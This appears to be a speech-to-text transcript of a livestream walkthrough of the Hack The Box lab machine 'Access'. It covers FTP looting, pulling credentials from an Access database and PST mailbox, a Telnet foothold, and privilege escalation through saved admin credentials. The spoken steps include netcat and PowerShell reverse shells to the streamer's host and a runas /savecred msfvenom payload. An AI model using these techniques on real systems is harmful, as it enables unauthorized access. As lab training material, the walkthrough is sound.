And we are back on... I don't remember what we even clicked on. Does anyone else remember what we clicked on? It wasn't sec notes. It was right here. Access. So we're going to do access like real quick. And then... DZ, when you going live? Within like the next hour or so? Because I have to eat lunch and everything. And DZ, if you go live, then I'll go eat lunch and stuff. And then I'll come back on. Then we'll do some more giveaways, stuff like that. Hack the box. Let's go ahead and make a directory for, this one's called Access, I believe. Access. Yep, let's go ahead and make a directory for Access. CD in there. I'm just going to start off with Rust Gans. We are on Hack the Box. 21, 23, Telnet. Telnet's up? Should we just Wireshark it and see if they got a user and see if we can grab some credentials off Telnet? You guys should have a video on that. Let's go ahead and do an mmap TAC P21. It's good to see some more ports open. Well, anonymous access is allowed into there. So we should probably check that out. And it looks like we're using IIS 7.5. Said that anonymous access was allowed. Cannot open data connection though. Okay. Wherever the Rust Gan's beating up too much. Let's go ahead and mmap port 23. Because is that really Telnet? I've never seen Telnet up really. Yeah, it's, I mean, it says Telnet. But we also did do like a bigger scan for it. But yeah, Telnet is up. Try that one more time over here. We always try enum for Linux also on it. See if we see anything with this. And we also have Microsoft IIS Server 7.5, which is old. So I'm a little scared this box is going to be super old. Well, DZ, what book is it? Can you, is it on Amazon? Can you drop it in the chat? If it's under like 20 bucks or so. I don't know how much it is. Probably like, it'd be like 50 bucks though, huh? Go ahead and check out that port 80 like real quick. Alright, we got ourselves a little data server closet. I mean, whoever set it up is kind of an asshole. You know, that door's going to be really hard to get into, like right there. So, guess you're not doing that. Looks like they try to do some like American red, white, and blue cabling here or something. I don't know. But, looks like shit. So, that looks like a pain in the ass. That's what that looks like. Oh, they got some LEDs going on back here. You know, got the RGB server rack. You know, stuff like that. So, next thing I'm going to give away is going to be a Slayer album. No, I'm just kidding. It's going to be Slayer. We do have this Megacore. HP title is Megacore. Like right here. So we might have to change our Etsy host. We'll see. Let's go ahead and do a Fearox Buster on that guy. I'm going to get rid of that ASPX at the end there. Let me go ahead and see DZ's thing over here. How much is it? Oh, man. I mean, it's in the price range. I mean, it is in the price range. Let me see here. Let me do some quick math. If we gave away that, that would be the last thing. That would be the last thing to be able to give away. Or we could do like 2 more Red Team field manuals. Or 1 more mouse pad, and one more field manual. Yeah, it's Telnet. It's saying it thinks it's Telnet. You can't figure out what version of Telnet it is, but it's definitely Telnet. All right. Let's figure this guy out. Let's let that guy run down there for like a minute. Let's go ahead and search exploit some IIS stuff. See if we got anything for 7.5. We do. PHP multiple vulnerabilities. Okay. FTP service unauthorized remote denial. So that's not going to fucking help out at all. So let's like that guy run for now and we'll go from there. The Telnet was what's weird to me. Wait, did I try to do an SMB client? Why am I trying to... I'm so used to Windows Machine. We're on FTP, not SMB client. I'm so used to freaking... Okay. Seeding the backups. Let's get that guy. That's huge. Okay, we might have to figure out another way to be able to get that guy. Are we getting him or no? I mean, no, that one was way bigger than that, wasn't it? That one we got. Okay, I think this one's going to be a little bit of a pain. Okay, so we got to figure out how the hell we're going to get those back to ourselves. We got to try and figure out how we can get those files back to us. Can I wget a file through FTP? Really? Can I do that? Do I have to like say like if it's gonna be in like shares or whatever else? Probably, huh? I feel like I would have to tell like /engineer/ or /backups. Whoa, not that. /backup/ backup.mdb. Can I do this like right here? Cannot initiate PSAV transfer. Do I have to do, well, we got more of it. That's still not the whole thing. Trying to get something this big, we're only getting something that big. Do I have to say, like, do I have to give it, like, a username? Like, TACU anonymous? Yeah, TAC user. Is it user equals or just user? User equals. TAC R, TAC MP. Okay. That'll get recursively. Still having problems. Can I like slow it down at all? It's grabbing this. But I feel like it's not getting the whole thing. You know what I'm saying? Like it's getting there, it's just not getting the whole thing. Well, if that's recursively, that should just be able to do it like that, right? No? Okay. Spelled engineer wrong, didn't I? Huh. Yeah, due to its size, yep. So, how the hell are we going to get this? File link right here. If we can't... How are we going to accomplish this task? Okay. Nothing like in there. But I also don't know if it's grabbing that full file or not. I also don't know if it's working or not. What I'm figuring like right now is the zip file is most likely password protected. The password is most likely in here somewhere. But we don't have anything really to go off of. Because I don't think it's actually getting the file correctly. We have all these like right here. I'm wondering if that has something to do with it. You know? Yeah, we could crack it using that, but we're not actually getting the full zip file. Like, we're having a problem grabbing the full zip file because it's so large, and we're not actually grabbing the whole thing, it seems like. And if, when we try to unzip it, it actually just gives us an error. Unsupported compression method. So yeah, we can do a zip to John for the accesscontrol.zip. Right. And then we can output that into john.hash. Then from there we can do a john for john.hash. But I feel like the password's most likely in the other file. And we're not seeing, we're really just not seeing what we, really much in those different files like right there. That's really what the problem is like right now. Because we're not able to get them properly. Hey, thanks a lot for the follow, Sarkis. Unzip tech L. Okay, we got somewhere. PST. What was that? So there is a file in there. Astral.pst, right? So saying that's on, we're not allowed. Do we have 7-zip on here? Yes, we do. How long do we want 7-zip? Extract files, full tech X. Or just X. 7-zip. X. That's our password. See, we need a password for this guy. Okay, let's go ahead. I got an idea. So we've already... No, I don't know if that's going to work on you. It's an Outlook file. That's what that is. A PST. Okay, yep. All right, let's... Nothing. I think it's probably got to be in here somewhere. But I don't think we're getting the file correctly. Wherever we strings in, I feel like I see like it's a PST file, so yeah, it's an Outlook file, backup Outlook file. So I feel like we should see like an email or something, right? If we do a strings for it, we're not really seeing much in here, but I feel like we should see like some type of output out, like an @ sign for it. Now, is there a way to be able to open up a Microsoft Access database on here? Is that a thing? Okay. Going to be tools. There we go. Okay. All right. I think we're getting somewhere. Yeah, we've done strings a couple times now. We haven't really found anything in there. That was MDB. That's what we just installed, right? Was MDB tools. I have to do this first. All right. So I feel like we should be able to look inside this guy. It's a Microsoft Access database, right? So we should be able to do an NDB. I thought we could. I thought we could look at it like that. After we installed. We installed it, right? I mean, it did install, right? Yeah. We have to actually go in there. It's like NDB table or something like that, I think. I think we want to go into an MDB table. He's nowhere to be found, but I feel like we just installed that. This is what we just did, like right there. Okay, so we got NDB array. Okay. I thought we could do an NDB tables. I thought that was a thing, and then we could look at that backup tables. Okay, we can. I just couldn't tap through it. Okay. But it is. Microsoft Access database. Now it doesn't appear to be a database. I wonder if it's because... I wonder if we're not getting the whole thing. Okay. Does it? See, it says that that's corrupt. I just don't think that we got it correctly. I think that whenever we got it, it messed up. That's, yeah, it's not getting it properly. What's that passive shit? Hey, you too, Hazard Patty. You have a good one. So I think my problem is like right there is that passive mode thing. Somebody keeps trying to go there. FTP tag, eh? What does that do? Does that make it go active? Okay. All right. Thank you. Never had to do that before. Yeah, that definitely was not that file like right there. And it's definitely way too big to transfer. We've had this happen before also with an FTP. And it took us like fucking hours to figure it out. That's just annoying. That one transferred. That one may have actually gone through. Hey, thanks a lot, Sally Prosper. That one looks just about the same size. Yep, it's not. It's still corrupted. It's not the whole damn thing. It's probably gonna say its file's corrupted. And we can't do a wget for it. Attack on that one. Maybe I should do an FTP user. An FTP pass. Maybe I should do something like that. Let's go! Now we got it. Motherfucker, what? Oh. There we go. Now we got our tables at least. Alright, cool. So we at least have the tables now. So we can now see stuff at least, right? Not nicely, but we can see stuff. Let's see if we can strings it now. Let's see if we get anything a little bit better on our strings. Since our last strings was trash. Alright, so we got quite a few things like right here. Backup admin, admin, engineer, access for you at security, admin, admin, admin. Is it just admin? Let's go ahead and throw that into a file. Stuff.txt. Administrator, administrator. Alright. Now we just need to figure out That's what we had before. Okay. We have an authorized user here. I saw it before. And I'm pretty sure that we can drop that authorized user. We can export it. So we can do an MDB export. Okay, there we go. All right. ID, username, password, status. So engineer is access for you at security. That's his password. Okay. Backup admin's admin. Admin is admin. Okay, so let's go ahead and do a nano user pass.text. And we're going to do a admin engineer access for you at security. Then we have backup admin. Awesome. Let's go. All right. So now we may be able to get in that file now with that 7-zip again, right? How did we open it up last time? The 7-zip file? The access file? Anyone remember? How did we read a PST file? Read PST. Well, that'll work. All right. Take it. Damn, I was really hoping that was going to be something. Nope, that's not a command. You lie like a rug, Linux. All right, read PST. Is it read PST or Reese PST? All right. We gotta figure out how to read a PST file now. LibreOffice. I really don't think that's gonna work, but hey. All right. Worked excellent. Didn't even try. How did we just did it a minute ago, didn't we? We just. Oh, we had a. Yeah, the password. Okay, we needed to put a password here. So I'm wondering, I'm thinking that this is for the engineer. I'm thinking it came from engineer, right? So I'm thinking access for you security. Okay, so we have the PST file no matter what. Okay, cool. So now how the hell are we going to read it? Stuff.txt? Oh, no, that's mine. Never mind. Read PST. I just want the read PST file. It's super simple. Okay. He's just saying it's read PST, but I feel like it's not though. So we just tried that. There's no installation candidate. PST utilities. Okay, let's try PST utilities. All right, let's try to install that. Oh, we tried that one. We tried apt install read PST. It doesn't exist. But it's saying that these ones exist. So that's why I went with those ones. But how the hell do we use this though? So maybe just some LSPST. That's something, okay. Guys, do that. All right, we're getting somewhere. Email from john@megacore.com. Subject Megacore access. Okay, we're getting somewhere. We did something. All right, let's go. Extract contents. Yeah, sure. Why not? PST to LDIF. It's PST 2. Is that right? That's all right. PST to LDIF. TAC D, the file name I'm going to go with is this. Okay, that was very useful. Options, we tried the file. TAC D. Okay, that was super useful, okay. Extract email messages, yeah, let's do that, okay. Read PST, oh, it's like right there. I think we have it now. Okay, so now we got the inbox and so how do I read that now? There is progress. We have progress. Those are 100% facts. But now we have this inbox thing. He's like cat inbox. Okay, that is English. We have progress, and I see the password for somebody is security. The account's been changed. Can we just LibreOffice that thing? Maybe make it a little bit nicer. That is much better. Look at that. Let's go. Let's freaking go. All right. The password for the account has been changed to that. Please ensure that it is passed to your engineers. What account? Regards, Johns. Hi there. The password for the account has been changed. So we have a password here, but we don't know what account it is. All right, now we just need to find an account. I'm sure we can find an account at some point. Okay, now we just need to find an account. Right? Security? Account for security? We're going to go with security. We're just going to go with security. Let's say, yeah, security. All right. Let's try to tell that in to 10, 10, 10, 98, I think it was. Yeah, 98. I don't know, because usually I use putty. So, yeah, usually I use putty, so I don't know. Telnet, enter. That was super helpful. Thank you very much, Telnet. Do you guys think like that is a super, you know, this is a Telnet kind of thing like right here. It's like, yeah, there's some shit in here. Tech L is user. Tech L is going to be, I think, security. Into 10, 10, 10, 98. Now, she asked for a password, right? Oh, God. How the hell do I put in a Telnet password through this? What the fuck is going on? Okay, wait. Okay, there we go. Let's go. Login is going to be security, I think. And then the password, I believe, is this. All right, we're in C users. Who am I? /priv. That's not how you spell that. Oh, God, we're in Telnet. Okay, who am I? /groups. Telnet clients. Yeah, we can definitely see that. Definitely, we are in Telnet. Is this the long stream? It is, Chad. Yes. We've given away a 2 red team field manuals, even though we gave away a red team field manual, blue team field manual, and also so far we've given away a Linux mouse pad, like an extra large one. We're going to give away a couple more things, mostly just more red team field manuals, something like that. There's no Star Trek. That is not. Those are not facts, dude. Hey, thanks a lot. Thanks a lot, Chad B. Noob, for gifting that sub out. Sarsex, like, yeah, Sarsex just makes shit up. Like, yeah, these are definitely facts, like right here. All right, so from Telnet, can you get in to PowerShell? God damn it. Thank you, Sarsek. Hey, Sarsek, thanks a lot for subbing that out. Thank you very much. That's freaking awesome. Okay, so we got security and public guy. Let's go ahead and get back into security. I think the hardest, what the fuck is Yacam? I think the hardest part of this whole thing is going to be like that we're in Telnet. Now, can we run a netcat reverse shell from Telnet, I wonder? Because that would make our lives, I think it would make our lives a little bit better, at least. I think it would make, you know, a little bit better of a thing for us, like right here. Where are we in, anyways? We are in access. I would say that was like a 4 or 5. We had to download some tools. I mean, we had to get some tools that we didn't know about. That PST thing kind of whooped my ass for like a minute. Let's go ahead and CD into tools. Can I download stuff into here? I feel like I'm just in the C. Only 16 more subs for 24-hour stream. That is not true, Sarsek. And we've already been going since 9 a.m. So it's actually 1400 like right now. So we've been going for 5 hours so far. All right. Let's go ahead and let's do a Python server. Can I do a system info on here? I'm going to go with old as shit. Since, you know, we're using Telnet. And there's 110 hot patches. So I'm going to go with it's old. 2008. Okay. Well, he's doing better than the other guy. The other guy only had like 10 hot patches, some of that. So not too old. We can't do juicy potato when nobody writes like that. So let's go ahead and let's throw netcat over here. All right, let's try to grab that. Oh god, I'm in fucking that thing, so I can't see what the hell I'm actually doing. I have config 10.10 14.21 netcat.exe, and we're gonna call it netcat.exe. Suppose he got online, he's trying to do something, so we know we can download stuff at least, right? That's a big deal. So we know we can at least download stuff and things like that, right? Okay, we can control C also, so that's a big deal too. Let's go ahead and do that. Let's see if we can put netcat.exe on here. We can. It looks like we can. dir. Okay, we have netcat at least now. So now, at the minimum, what we can do, we can at least get a... Let's go ahead and start the listener. I thought netcat 64 was going to be that, but I guess not. Alright, that's okay. That's okay. We don't need to download anything else. Let's go into CD into users again. We had that public, which you can't press backspace on here in case you guys are wondering what the hell I'm doing, why I keep doing that. There's no backspace, or you don't see how far you backspace. Let's CD into public. See if there's anything in here. Documents. All right. There we go. That was dir/a. That's showing hidden files, things like that. He didn't have damn desktop. Okay, so he didn't desktop, but I say he didn't have a freaking desktop. Start search for hidden files here. The fuck is that? CK Access 3.5? Is that a thing? ZK Access 3.5. Insecure file permission, escalation, and persistent cross-site scripting. Obviously, we want to do the persistent cross-site scripting. This is Terminator Terminal. This flag right here is Terminator. I like it a lot. Alright, so we got a text file over here. I know you guys probably can't see because my face is in the way. What would you rather see, the text file or my face? The text file, 100%. Alright, let's go ahead and cat. Let's actually Sublime text that guy. Alright. 3.5 desktop software is suitable for small and medium businesses applications. Is it really now? You say it's suitable, but is it? Did the company say it was suitable? So testing out Windows 7 Ultimate Service Pack 1. So Windows 2008 R2 could probably fall into this. We got an ICACLS for that. We should probably look that up actually and see, do we have rights to mess with it? That's a good point. Okay. I wonder if I have to put in the whole thing or if I can just do that. Yeah, I have to put in this whole damn thing. Probably need to find that file too, huh? Administrators have full rights. That's the authority system has full rights. And we do not. Or no, administrator doesn't have full rights. We ain't got shit. I probably need to actually find where that's actually running at, don't I? So we probably need to go into like, that's the link for it. That's great and all. So there's probably something in program file somewhere. I'm on 2008, so I gotta... Never mind. Zekteco, is that it? Okay, there we go. So there's the directory for it. So we can do an ICACLS for that. Users, create owner has full access. Users do not. Most jacked up thing I've ever seen. What are we looking at here? Okay, we're looking from here down. No, it's not type. No. What you're seeing like right now is because we're in Telnet. That's not Terminator. This is Telnet, and no, it's not. It's exactly what you see is exactly what I'm feeling too. So it's not anything to do with your stream. Your stream is actually just fine. We can't backspace. We can't really do much. So, all right, but we do have this thing right here. Built-in users who am I / groups. We're in built-in users, and built-in users, they have not full rights over it. I don't know if we're a creator owner for this thing. I don't know who the owner is, but I mean, I'm sure we can figure it out, right? I'm sure we can figure it out. Now, what I'm wondering is if we can run it as somebody else, though. The administrator has full access to this thing, right? Is that it? You just said, hey, you can type that in, and that's it, huh? All right, what does it say? Elevation of privileges vulnerability, which can be used by a simple authenticated user that can change the executable file with a binary of choice. The vulnerability exists to the improper permissions with an M flag modified for authenticated users. So our built-in users, do we have the M flag? No. That's kind of a... There's no point in doing that, I guess, huh? What the fuck is Telnet? Yo, Telnet is the greatest thing ever. Alright? Anytime you're trying to do something on a router, Telnet into it. Don't use SSH, Telnet. Let everyone else know what you're doing, so we don't have that. Okay. Let's go back to that LNK file. Because that's a link file like right there. Let's go ahead and go back to that. C users public desktop. Let's try to look at that guy. Damn it. There's no backspace. You can't back it up. Ain't no backing up in this one. Run as an executable for Windows System 32, run as.exe, Windows System 32, run as executable, ZTAC user access administrator save creds. It's got credentials on the machine that are saved. You freaking hate to see it. The administrator is saving his credentials on the machine. Come on, people. Come on. We can't be having that. We cannot have that like right there. We have to do, I'm pretty sure, a run as, or we can also do a command key list. Currently stored credentials are administrator. I was hoping it would give me the currently stored credentials, but no, why would it? Okay. So, we have to get a callback. Because if we can get a callback, we can... Well, I wonder if we can just run as those saved credentials. Because, I mean, we kind of see it, right? Well, no, that's just going to run this guy's saved credentials. Who else cares? Let's get a callback. Okay, I got an idea. All right, let's go. I got an idea. Clear that out. CD and tools. Let's go ahead and go into Sublime Text, Invoke, PowerShell, TCP EX. That's good on port 3333. Okay, that's good. Because we should be able to call for PowerShell from command prompt, and even if it's not going to run, we should be able to get past the command if we do an IEX IWR, which we can't fucking do. That's still okay. Because we don't need to do an IEX IWR. We can just do a cert util on this guy, put him on there, and then we can import the module from there within PowerShell, which will run that module, which should then run this invoke PowerShell TCP.ps1. Okay. Yep, that should work. If anybody just followed along, good job. If you didn't, you'll see here in a second what I'm talking about. So what we can do, right, is we are going to throw in 10.10. I'm an idiot. 10.10.14.21 slash invoke PowerShell TCP executable.ps1, right? That's what we want. And we're going to call this invoke PowerShell TCP executable.ps1. We just call it shell.ps1. Make our lives a little bit easier, right? So let's go ahead and copy this whole thing. We'll throw it over into our awesome telnet session that we have. Hopefully we can do it. Okay, access denied. That's okay. C users. I forgot who I am. CD into security. CD into desktop. Let's try that again. Let's go. All right, now we should be able to do a PowerShell taxi for a command. Period slash shell.ps1. And let's go ahead and create a listener for port 3333. Right? That's what we were listening on, right? 3333. Okay. Okay, that's okay. We can work with that. Let's do a PowerShell tac EP bypass taxi period slash shell.ps1. Let's freaking go! There we go. All right, now we know that we can get a callback for us, right? Now all we have to do is just do a run as with that, and we should get a callback as the administrator because his credentials are already freaking saved, right? So now we have to do is a run as user. Damn me in my ways. We're going to write it over here. Run as user. Slash user like that. Yeah, user colon administrator, right? And then we got to run something as that. We can just use the save creds, right? Save creds. And then we can go ahead and we can run PowerShell taxi. Do I just run like that or do I have to actually say run? I think I just run like this, right? PowerShell taxi. PowerShell tac EP bypass. Taxi period slash shell.ps1. Let's listen. Okay, we're listening up there. Supposedly, this should work. I don't know if we're going to need the quotes for the run as thing. I don't know. We're about to find out. Wait, what am I trying to run as? Okay, let's try to do that again without the quotes then. But we just got that guy to run, right, with PowerShell? Let's just try just to get him to run again. That runs. So why doesn't it do it with a run as? Am I typing in run as wrong? Am I doing that part wrong? I feel like I kind of have to be. You know why? Try that. Maybe that user doesn't exist. Nope. Huh. Yeah, that's what I was just thinking was domain user. I was thinking the same exact thing, but it doesn't seem to want to do it now, does it? I wonder if I need a full path since we're doing run as him. I wonder if we need to do the full path. If we need to do something like... Command.exe to call for what? It's a PS1 script. We can't use command.exe to call for it. If we were to do shell.ps1, I'd be super confused. At least as far as I know it would. Yeah. I won't run that. So what I'm thinking is that we're not actually getting into PowerShell right now. So let's just try to grab the netcat 32-bit. Which I feel like I literally have that one. Well, PS exec. We can put PS exec. I think I only have PS exec 64 though. Oh my god, that's why it didn't work last time. Because I was trying to upload a whole file. Okay, let's try to do with this again. We got this. We got this. Let's go. I got an idea. We'll do a netcat.exe, and then we'll just call it netcat.exe. Let's go and throw that over in here. Let's make sure that works first. Period slash or netcat.exe. Oh shit. Netcat.exe tac e command for 10.10 14.21 3333. Program is blocked by group policy? What? What if we call it PowerShell? No, program is blocked by group policy. Yeah, we tried that in the beginning. The PowerShell, to quote all the PowerShell commands. We tried that one first. Because we should just be able to technically just do that like right there. Right? We tried that one in the beginning, but we didn't get anything. Now what I'm thinking... Can we actually just do a PowerShell tag EP bypass import module shell.ps1. No module file was found in the module directory. It's right there. That does work. Okay, that does work. I'm not losing my mind here. So now all we should have to do before that is just run as saved creds. Is it saved cred or saved creds? Should be slash saved cred. Then the rest of it. What if Microsoft temp Well, it's not going to be able to find it there, huh? That should technically work. Administrator / save cred. That should work like right there. There should be nothing. This shouldn't be very difficult to do. You know? This should not be difficult at all to do, but it's becoming very, very difficult to do. Let's try it with that access again on there. Wait. Can I guys get into fucking PowerShell? Because if so, I'm going to be pissed. Wait a minute. If I can get a PowerShell up here, then I want to do all that crap down there. If I just call for the PowerShell file up here, then I could just rerun another one with run as. How would I call the callback? Because if I run it as user administrator, it's going to then end up opening up in like 338, not like it'll open up another window. sorry, Lexi.net. Sorry about that. Okay, let's go ahead and close out of here. Let's try to tell that back into this guy. Shit, it was security and what else? I never wrote it down? God damn, I'm stupid, huh? Damn it, I'm dumb as rocks. Oh my god, I didn't write it down. The very first time I've never wrote anything down. Is it in password.txt? Never mind, I wrote it down. Is that it? Okay. I wrote it down, never mind. Okay. I have another idea. So we got that guy up there. We can run PowerShell, we know that much. So let's go and CD in the desktop. Because we might just be able to just get PowerShell, then we won't have to go through all this crap. CD in the desktop. dir. Let's go ahead and do a PowerShell tech EP bypass. Shell.ps1. Wrote that whole thing just to have it fuck up at the end. I hate you. I hate you telling that. Okay, now I'm wondering if PowerShell will actually open up here. Okay, now we have PowerShell, so who cares? Now we just do a run as, and we can just pretty much just do it again, right? So let's make another one. We'll make a shell 2 kind of thing. Let's kind of just do it again, I think. Can we do that? Actually, I don't know if we're going to be able to do that. I don't think invoke PowerShell likes to do that, like right there. We'll try it. We'll try it anyways. We'll give it a shot. We'll see what happens. Hey, thanks a lot for follow, Kipono. Okay, let's go ahead and give it a try. Let's make another one. Okay, and then we'll just do another iCackles over here. ICACLS. Or can we just do a wget? Can we do wget up here? No, we cannot do wget. Okay, let's try to do ICACLS then. Or cert util, I mean. Command failed. Can we just do it from down here? Why did it fail this time? Didn't fail the last 10 times. Probably because it's not in that file, is it? So let's go ahead and actually throw this back on. Probably because I'm not in the right directory, huh? Listen again. This time I got to listen out 4444. No, we're not. It's 3333, I think. Grab him again. Do a Python web server again. Throw this guy on. Over here. Shell 2 is going to be 4444. Run as user administrator. Save cred. Period slash shell 2.ps1. So that does work. Shell 2 does work. But why won't it run as the administrator now? Did you just break for some reason? What just happened like right there? I don't know what's happening like right now. Hey, thanks a lot for following, Night Welder. We have saved creds on the machine. We already know that much. This guy, he seems to be stuck now. I think I just broke him. We know how PowerShell scripts work. This is super confusing. Run as save cred. Slash save cred. Run as. We're not doing anything crazy here, right? Run as. Save cred, user, and then we just run something. Should we just try to run something like that maybe? Like make a file, like an executable and put it onto there? This shouldn't be that difficult. It's not going to be an x64. We know that much. We just have it just be a shell reverse TCP. So we can grab it with that netcat over there, right? Let's call it shell.exe. We do assert util up there for that shell.exe. We do something like this. Okay, now can we just run that? Run as save cred user access / administrator shell.exe. Well, we got to do a period / shell.exe because we're in PowerShell. Okay, that was much easier. That was way easier. All right, let's go. That was much easier than trying to run a PowerShell script to a PowerShell script. I don't know what was happening there, but we're getting it now. So that's good. Probably should fire up MSF Venom. We'll do that here in a second if that one doesn't work. Or MSF console, I mean. We'll go ahead and set the payload as Windows Shell Reverse TCP. I figured that would work because it's just coming back to a netcat listener. But maybe not. Might not be able to realize like that's like a stage payload, stuff like that. Maybe if I did a stage list or whatever else. Use exploit multi-handler, set payload to that guy, set our L host to 10, set our L ports 4444. Let's go ahead and run that. Stop running that. Go ahead and run that again. It looks like we're in administrator because we're in system 32. CD into C. Users, administrator, desktop. Thank God. Type out that root.txt and we are finished. Let's freaking go. All right, cool. I think I made that way more difficult than what it had to be. About 2,000 times more difficult, but hey, at least people learn stuff, right? I think people learn something. I don't know. I'm just an asshole. All right. It is officially 3:17 in the evening here. I don't know what that has to do anything with you guys, but it is. Let me go ahead and go to InfoSec Streams. DZ64 is currently on. I am going to make some food. Can you recap that? Yes, I can. Yes, I can. All right, so what we did there. All right, so we got our very first foothold, right? With our, in the Telnet, right? We got our Telnet foothold, right? From there, once we're in Telnet, we can't really do much. Telnet's pretty shitty. So what I did was I created a file, which I like to call the executable one. So if I look at my executable file, this is invoke PowerShell TCP, my initiating, all right? And so what we did was we created an invoke PowerShell TCP. I then put an EX on the end of it so I know that's the executable version. And I had it call back to myself. All right, so when it was ran, it automatically called back to me. So I was listening up here for a callback, right? Once I got that callback, now I can actually mess with it more. I can delete stuff. I can press up. I can do different things, right? You know, I can delete, stuff like that. You know, I have more capabilities to do stuff. From there, what we did was we created a shell.exe. So we knew that there was a saved creds in here. Because if we do a command, oops, whatever. If we come down here and do a command key / list, I think it is. We can see that there is saved creds in here. The domain password is saved. And it'll say by user administrator, right? So we know that there's saved creds. So all we had to do now was just run as our saved creds for user access administrator, right? Access administrator. And we created an MSF Venom file called shell.exe. So it just ran that with the saved creds as administrator, called back to us under shell.exe. So we don't have to actually crack anything. We just see that, hey, it's going to use those saved creds come across. We listened for it within Metasploit, thus allowing us to be able to get that callback for shell.exe. So, DZ64 is online. I hope I recorded that. I did.